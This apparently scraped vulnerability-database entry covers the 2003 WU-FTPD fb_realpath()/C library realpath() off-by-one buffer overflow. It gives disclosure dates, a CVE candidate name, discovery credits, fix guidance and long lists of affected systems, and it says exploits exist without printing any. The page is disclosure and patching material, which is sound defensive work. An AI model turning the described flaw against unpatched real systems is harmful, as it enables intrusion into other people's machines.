July 19, 2003	vendor-sec list notified
July 31, 2003	Coordinated public disclosure


The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0466 to this issue.

-- 
Janusz Niewiadomski
iSEC Security Research
http://isec.pl/


    

- Vulnerability Information

2133
WU-FTPD fb_realpath() Function Off-by-one Error
Local Access Required, Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

A local off-by-one overflow exists in WU-FTPD. The fb_realpath() function fails to validate user input resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2003-07-31 Unknown
2003-08-04 Unknown

- Solution

Upgrade to version 2.6.2-12 (Available on some Linux distributions) or higher, as it has been reported to fix this vulnerability. In addition, WU-FTPD Development Group has released a patch for some older versions of the primary distribution.

- Vulnerability Information

Multiple Vendor C Library realpath() Off-By-One Buffer Overflow Vulnerability
Boundary Condition Error 8315
Yes No
2003-07-31 12:00:00 2007-05-15 07:08:00
Discovery of this vulnerability has been credited to Janusz Niewiadomski <funkysh@isec.pl> and Wojciech Purczynski <cliph@isec.pl>.

- Affected Program Versions

Washington University wu-ftpd 2.6.2
+ Compaq Tru64 5.1 b PK2 (BL22)
+ Compaq Tru64 5.1 b PK1 (BL1)
+ Compaq Tru64 5.1 b
+ Compaq Tru64 5.1 a PK5 (BL23)
+ Compaq Tru64 5.1 a PK4 (BL21)
+ Compaq Tru64 5.1 a PK3 (BL3)
+ Compaq Tru64 5.1 a PK2 (BL2)
+ Compaq Tru64 5.1 a PK1 (BL1)
+ Compaq Tru64 5.1 a
+ Compaq Tru64 5.1 PK6 (BL20)
+ Compaq Tru64 5.1 PK5 (BL19)
+ Compaq Tru64 5.1 PK4 (BL18)
+ Compaq Tru64 5.1 PK3 (BL17)
+ Compaq Tru64 5.1
+ Compaq Tru64 5.0 f
+ Compaq Tru64 5.0 a PK3 (BL17)
+ Compaq Tru64 5.0 a
+ Compaq Tru64 5.0 PK4 (BL18)
+ Compaq Tru64 5.0 PK4 (BL17)
+ Compaq Tru64 5.0
+ Compaq Tru64 4.0 g PK3 (BL17)
+ Compaq Tru64 4.0 g
+ Compaq Tru64 4.0 f PK7 (BL18)
+ Compaq Tru64 4.0 f PK6 (BL17)
+ Compaq Tru64 4.0 f
+ Compaq Tru64 4.0 e
+ Compaq Tru64 4.0 d PK9 (BL17)
+ Compaq Tru64 4.0 d
+ Compaq Tru64 4.0 b
+ Conectiva Linux 9.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ SCO Open Server 5.0.7
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ Sun Linux 5.0.7
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 6.0
Washington University wu-ftpd 2.6.1
+ Caldera OpenLinux 2.3
+ Caldera OpenLinux Server 3.1
+ Cobalt Qube 1.0
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
- FreeBSD FreeBSD 5.0 alpha
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 6.1
+ Mandriva Linux Mandrake 6.0
+ RedHat Linux 7.2 noarch
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 athlon
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 noarch
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
- S.u.S.E. Linux 7.3
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1 x86
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ SCO Open Server 5.0.5
+ SCO Open Server 5.0.4
+ SCO Open Server 5.0.3
+ SCO Open Server 5.0.2
+ SCO Open Server 5.0.1
+ SCO Open Server 5.0
- Slackware Linux 8.0
- Slackware Linux 7.1
- Slackware Linux 7.0
+ Turbolinux Turbolinux 6.0.5
+ Turbolinux Turbolinux 6.0.4
+ Turbolinux Turbolinux 6.0.3
+ Turbolinux Turbolinux 6.0.2
+ Turbolinux Turbolinux 6.0.1
+ Turbolinux Turbolinux 6.0
+ Turbolinux Turbolinux Workstation 6.1
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 7+
Washington University wu-ftpd 2.6 .0
+ Cobalt Qube 1.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
+ HP HP-UX 11.11
+ HP HP-UX 11.0
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ RedHat Linux 5.2 sparc
+ RedHat Linux 5.2 i386
+ RedHat Linux 5.2 alpha
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.2
+ S.u.S.E. Linux 6.1 alpha
+ S.u.S.E. Linux 6.1
+ Turbolinux Turbolinux 4.0
+ Wirex Immunix OS 6.2
Washington University wu-ftpd 2.5 .0
+ Caldera OpenLinux 2.4
+ Caldera OpenLinux Desktop 2.3
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ SCO eServer 2.3
Sun Solaris 9_x86
Sun Solaris 9
SSH Communications Security SSH2 3.2.9 .1
RedHat wu-ftpd-2.6.2-8.i386.rpm
+ RedHat Linux 8.0 i386
RedHat wu-ftpd-2.6.2-5.i386.rpm
+ RedHat Linux 7.3 i386
RedHat wu-ftpd-2.6.1-18.ia64.rpm
+ RedHat Linux 7.2 ia64
RedHat wu-ftpd-2.6.1-18.i386.rpm
+ RedHat Linux 7.2 i386
RedHat wu-ftpd-2.6.1-16.ppc.rpm
+ RedHat Linux 7.1 pseries
+ RedHat Linux 7.1 iseries
RedHat wu-ftpd-2.6.1-16.i386.rpm
+ RedHat Linux 7.1 i386
OpenBSD OpenBSD 2.9
OpenBSD OpenBSD 2.8
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.5
OpenBSD OpenBSD 2.4
OpenBSD OpenBSD 2.3
OpenBSD OpenBSD 2.2
OpenBSD OpenBSD 2.1
OpenBSD OpenBSD 2.0
OpenBSD OpenBSD 3.3
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0
NetBSD NetBSD 1.6.1
NetBSD NetBSD 1.6
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.8 -PRERELEASE
FreeBSD FreeBSD 4.8
FreeBSD FreeBSD 4.7 -STABLE
FreeBSD FreeBSD 4.7 -RELEASE
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6.2
FreeBSD FreeBSD 4.6 -STABLE
FreeBSD FreeBSD 4.6 -RELEASE
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5 -STABLEpre2002-03-07
FreeBSD FreeBSD 4.5 -STABLE
FreeBSD FreeBSD 4.5 -RELEASE
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4 -STABLE
FreeBSD FreeBSD 4.4 -RELENG
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 4.3 -STABLE
FreeBSD FreeBSD 4.3 -RELENG
FreeBSD FreeBSD 4.3 -RELEASE
FreeBSD FreeBSD 4.3
FreeBSD FreeBSD 4.2 -STABLEpre122300
FreeBSD FreeBSD 4.2 -STABLEpre050201
FreeBSD FreeBSD 4.2 -STABLE
FreeBSD FreeBSD 4.2 -RELEASE
FreeBSD FreeBSD 4.2
FreeBSD FreeBSD 4.1.1 -STABLE
FreeBSD FreeBSD 4.1.1 -RELEASE
FreeBSD FreeBSD 4.1.1
FreeBSD FreeBSD 4.1
FreeBSD FreeBSD 4.0 .x
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5.1 -STABLEpre2001-07-20
Apple Mac OS X Server 10.2.6
Apple Mac OS X 10.2.6

- Exploit

The following exploits are available.

- Solution

Please see the referenced vendor advisories for further information.


RedHat wu-ftpd-2.6.1-18.i386.rpm

RedHat wu-ftpd-2.6.1-16.i386.rpm

OpenBSD OpenBSD 3.2

RedHat wu-ftpd-2.6.1-16.ppc.rpm

RedHat wu-ftpd-2.6.1-18.ia64.rpm

RedHat wu-ftpd-2.6.2-8.i386.rpm

RedHat wu-ftpd-2.6.2-5.i386.rpm

Sun Solaris 9

OpenBSD OpenBSD 3.3

Sun Solaris 9_x86

NetBSD NetBSD 1.5

NetBSD NetBSD 1.5.1

NetBSD NetBSD 1.5.2

NetBSD NetBSD 1.5.3

NetBSD NetBSD 1.6

NetBSD NetBSD 1.6.1

Apple Mac OS X Server 10.2.6

Apple Mac OS X 10.2.6

Washington University wu-ftpd 2.6 .0

Washington University wu-ftpd 2.6.1

Washington University wu-ftpd 2.6.2
